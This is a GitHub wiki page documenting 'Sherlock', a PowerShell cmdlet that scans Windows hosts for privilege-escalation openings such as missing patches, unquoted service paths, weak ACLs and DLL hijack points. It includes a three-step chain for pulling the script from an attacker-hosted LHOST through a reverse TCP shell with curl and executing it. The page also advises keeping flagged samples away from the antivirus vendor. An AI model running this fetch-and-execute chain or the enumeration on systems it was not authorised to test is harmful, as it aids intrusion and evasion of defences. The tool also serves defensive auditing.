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Find missing software patchs\Paths for privilege escalation (windows)

pedro ubuntu edited this page Jan 15, 2021 · 230 revisions


:octocat: SYNOPSIS

'Find missing software patchs (or vulnerabilitys) for privilege escalation on windows ( vista | 7 | 8 | 8.1 | 10 )'

Author: @_RastaMouse (Deprecated)
CmdLet: @r00t-3xp10it (v1.3)
Tested Under: Windows 10 (18363) x64 bits
______________: Windows 7 x64 bits
Required Dependencies: none
Optional Dependencies: none
PS cmdlet Dev version: v1.3

What Is Privilege Escalation and Why Is It Important?
Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system admin can perform unauthorized actions.

Most computer systems are designed for use with multiple user accounts, each of which has abilities known as privileges. Common privileges include viewing and editing files, or modifying system files. Privilege escalation means a user receives privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used.

:octocat: Wiki Jump Links

[1] - Cmdlet Description
[2] - Cmdlet Parameters
[3] - CmdLet Basic Usage
[4] - Download Cmdlet
[5] - Final Notes
[6] - Report Issues

:octocat: Cmdlet Description

CmdLet to find missing software patchs (or vulnerabilitys) for privilege escalation on windows ( vista | 7 | 8 | 8.1 | 10 )
This CmdLet continues @rasta-mouse (Deprecated) Module with new 2020 CVE entrys and a new function to find missing security KB patches by comparing the list of installed patches againts Sherlock KB List entrys ($dATAbASE). This Cmdlet also Searchs for 'Unquoted service paths' (EoP vulnerability) and recursive search for folders with Everyone:(F) permissions (ACL)

Sherlock CmdLet was created to be one Venom v1.0.17.7 post-exploitation auxiliary script to be executed in venom amsi
evasion reverse tcp shell's. But it can be executed in a Local environement to help Blue Teams to identify EoP entry points.
'The follow 3 steps describes how to use Sherlock post-exploitation auxiliary PS script on venom reverse tcp shells'

1º - Place this cmdlet in attacker machine apache2 webroot (bash prompt)

    cp venom/aux/Sherlock.ps1 /var/www/html/Sherlock.ps1

2º - Then upload Sherlock using the reverse tcp shell prompt

    cmd /c curl http://LHOST/Sherlock.ps1 -o %tmp%\Sherlock.ps1

3º - Now remote execute Sherlock using the reverse tcp shell prompt

    powershell -W 1 Import-Module -Name "$Env:TMP\Sherlock.ps1" -Force;Find-AllVulns

The follow screenshot shows Sherlock beeing executed through webserver (Venom v1.0.17.7 aux script) reverse tcp shell. rasta-mouse-EOP
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:octocat: Cmdlet Parameters

Function Argument Privileges Description Supported
Get-HotFixs $null 🚶 UserLand Find missing KB (HotFix) security packages Windows ( vista | 7 | 8 | 8.1 | 10 )

<Microsoft®Update Catalog>

Function Argument Privileges Description Supported
Get-GroupNames $null 🚶 UserLand List ALL Group Names Available Windows ( vista | 7 | 8 | 8.1 | 10 )


Function Argument Privileges Description Supported
Get-Rotten $null 🚶 UserLand Find Rotten Potato vuln settings (EoP) Windows ( vista | 7 | 8 | 8.1 | 10 )

<rotten potato - from account to system>

Function Argument Privileges Description Supported
Get-Unquoted $null 🚶 UserLand Find Unquoted service vuln paths (EoP) Windows ( vista | 7 | 8 | 8.1 | 10 )

<pentestlab - unquoted service path>

Function Argument Privileges Description Supported
Get-Paths $null 🚶 UserLand Search for folders with Everyone:(F) permissions Windows (vista|7|8|8.1|10)

<travisaltman - EoP by weak service permissions>

Function Argument Privileges Description Supported
Get-Paths BUILTIN\Users 🚶 UserLand Search for BUILTIN\Users Group Name folders Windows (vista|7|8|8.1|10)

<travisaltman - EoP by weak service permissions>

Function Argument Privileges Description Supported
Get-RegPaths $null 🚶 UserLand Find Weak Registry Permissions (EoP) Windows ( vista | 7 | 8 | 8.1 | 10 )

<travisaltman - EoP by weak service permissions>

Function Argument Privileges Description Supported
Get-ModifiableRegPaths $null 🚶 UserLand Find Srv registry keys with User:(M) W ( vista | 7 | 8 | 8.1 | 10 )

<travisaltman - EoP by weak service permissions>

Function Argument Privileges Description Supported
Get-DllHijack EnvPaths 🚶 UserLand Finds all %PATH% .DLL hijacking opportunities. W (vista|7|8|8.1|10)

update2 update3

Function Argument Privileges Description Supported
Get-DllHijack $null 🚶 UserLand Scan's for DLL's prone to hijacking (@adamkramer) W (vista|7|8|8.1|10)

Remark: dll_hijack_detect binary might be flag 'suspicious' by Anti-Virus, but it still executes (Just dont send samples to $M)
<adamkramer - Detecting dll hijacking on windows>

Function Argument Privileges Description Supported
Find-AllVulns $null 🚶 UserLand Scan's for CVE's (EoP) using Sherlock $dATAbASE W (vista|7|8|8.1|10)


Function Argument Privileges Description Supported
Use-AllModules $null 🚶 UserLand Run ALL Sherlock enumeration modules W (vista|7|8|8.1|10)
Use-AllModules FullRecon 🚶 UserLand Run Sherlock FullRecon enumeration modules W (vista|7|8|8.1|10)

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:octocat: Basic Usage

Remark: Sherlock by default uses 'Everyone' (Group Name) to search for 'FullControl' privileges set. (weak folders|services)

Remark: Allways use double quotes if the 'Group Name' contains any 'empty spaces' in argument declarations.

Recomended Group Names to search for EoP vulnerabilitys

Vulnerable Group Name      Permissions     Severity     Sherlock Scan
---------------------      -----------     --------     -------------
Everyone                   FullControl     Higth        Automatic
BUILTIN\Users              FullControl     Medium       Manual
NT AUTHORITY\INTERACTIVE   FullControl     Medium       Manual

Remark: If executed 'PS C:\> Use-AllModules FullRecon' then ALL vulnerable Group Names will be scanned

Recomended permissions to search for EoP vulnerabilitys

Permissions     icacls    Severity    Sherlock Scan
-----------     ------    --------    -------------
FullControl     (F)       Higth       Automatic
Write           (W)       Higth       Manual
ReadAndExecute  (RX)      Medium      Manual
Modify          (M)       Medium      Manual

Remark: If executed 'PS C:\> Use-AllModules FullRecon' then Permissions (F) (W) (M) will be scanned.

Get-Help Cmdlet

Get-Help .\Sherlock.ps1 -full

Import Module
SYNTAX : Import-Module -Name <Absoluct-Path> -Force

Import-Module -Name $Env:TMP\Sherlock.ps1 -Force

List allGroup Names available


Find missing KB (HotFix) patches


Find Rotten Potato vulnerable settings


Find Unquoted service vuln paths


Find folders with Everyone:(F) permissions


Find folders with Everyone:(ReadAndExecute) permissions
SYNTAX : Get-Paths <FileSystemRights>

Get-Paths ReadAndExecute

Find folders with BUILTIN\Users:(FullControl) permissions
SYNTAX : Get-Paths <FileSystemRights> <IdentityReference>

Get-Paths FullControl BUILTIN\Users

Find Weak Services Registry Permissions - Everyone:(F)


Find Weak Services Registry Permissions - BUILTIN\Users:(F)
SYNTAX : Get-RegPaths <IdentityReference>

Get-RegPaths BUILTIN\Users

Checks the permissions of registry keys and returns the ones that the current user can modify.


Scan's for DLL's Prone to Hijacking


Finds all %PATH% .DLL hijacking opportunities.

Get-DllHijack EnvPaths

Scan's for CVE's (EoP) using Sherlock $dATAbASE


Use ALL Sherlock Modules at once (all-functions)


Use ALL Sherlock Modules at once (All-functions With Manual Args User Imputs)

Get-HotFixs;Get-Rotten;Get-Paths ReadAndExecute BUILTIN\Users;Get-RegPaths BUILTIN\Administrators;Find-AllVulns

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:octocat: Download Cmdlet

Wget Download|Manual download [STABLE Version]


Get-Help Cmdlet

Get-Help .\Sherlock.ps1 -full

Import Module [Mandatory]
SYNTAX : Import-Module -Name <Absoluct-Path> -Force

Import-Module -Name $Env:TMP\Sherlock.ps1 -Force

Use-AllModules (FullRecon)
Remark: FullRecon @arg scans for: Everyone, BUILTIN\Users, NT AUTHORITY\INTERACTIVE Group Names
and FullControl(F), Write(W), Modify(M) Permissions recursive of $Env:PROGRAMFILES|PROGRAMFILES(x86) folders.
FullRecon @argument will auto-detect target host Group Names in diferent languages ( English, Portuguese ,France ,Etc .. )

Use-AllModules FullRecon

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:octocat: Final Notes

Sherlock has proven to be a project in permanent development, simply because escalation of privileges encompasses many diferent techniques. For that reason I will continue to develop Sherlock whenever possible. (with new version releases)

Current ChangeLog

 Version    Update Date      Update Info          Description                                     DevStage  Repo
 -------    -----------      -------------        -----------                                     --------  ----
 v1.3       01/01/2021       Oficial Release      Released sherlock version v1.3                  STABLE    GitHub

 v1.3.1     02/01/2021       CVE-2020-0986        splWOW64.sys Local Elevation of Privileges      BETA      Gist
 v1.3.1     02/01/2021       Unquoted services    $_.StartName -ieq 'LocalSystem' filter added    BETA      Gist
 v1.3.1     02/01/2021       Get-DllHijack        Search for dll's prone to hijacking function    BETA      Gist
 v1.3.1     02/01/2021       $M CVE assign nº     CVE-2020-0986 assigned to CVE-2020-17008        BETA      Gist
 V1.3.1     03/01/2021       Oficial Release      Released Sherlock version v1.3.1                STABLE    GitHub

 v1.3.2     04/01/2021       Get-DllHijack        Corrupted download checks (x86|x64) bugfix      BETA      Gist
 v1.3.2     04/01/2021       Get-DllHijack        &"$Env:TMP\$ArchiveName.exe" (Ampersand exec)   BETA      Gist
 v1.3.2     04/01/2021       Get-DllHijack        EnvPaths @argument added to Get-DllHijack       BETA      Gist (*)
 v1.3.2     04/01/2021       Use-AllModules       Run ALL Sherlock enumeration modules            BETA      Gist
 v1.3.2     05/01/2021       Oficial Release      Released Sherlock version v1.3.2                STABLE    GitHub

 v1.3.3     05/01/2021       Use-AllModules       FullRecon enumeration @argument added           BETA      Gist
 v1.3.3     06/01/2021       CVE-2020-25106       SUPREMO (rat) Local Privilege Escalation        BETA      Gist
 v1.3.3     06/01/2021       Get-HotFixs          Windows 8.1 x64 bits HotFix database            BETA      Gist
 v1.3.3     06/01/2021       CVE-2020-1048        Ualapi.dll Microsoft Spooler Local EoP          BETA      Gist
 v1.3.3     06/02/2021       Use-AllModules       FullRecon @argument searchs for cmdkey creds    BETA      Gist
 v1.3.3     08/01/2021       CVE-2020-5752        Bypassing Anti-Virus amsi string detection      BETA      Gist
 v1.3.3     08/01/2021       Oficial Release      Released Sherlock version v1.3.3                STABLE    GitHub

 v1.3.4     12/01/2021     Get-ModifiableRegPaths new EoP scan technic added to Sherlock          BETA      Gist
 v1.3.4     13/01/2021       Get-GroupNames       List ALL Group Names Available                  BETA      Gist
 v1.3.4     13/01/2021       Get-HotFixs          Windows 10 x64 bits KB list update              BETA      Gist
 v1.3.4     13/01/2021       CVE-2021-1642        AppX Deployment Service (AppXSVC) EoP           BETA      Gist
 v1.3.4     15/01/2021       Oficial Release      Released Sherlock version v1.3.4                STABLE    GitHub

(*) Checks if the current %PATH% has any directories that are writeable (W) by the current user.
Sherlock v1.3.4 [BETA]

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:octocat: SSA RedTeam @2021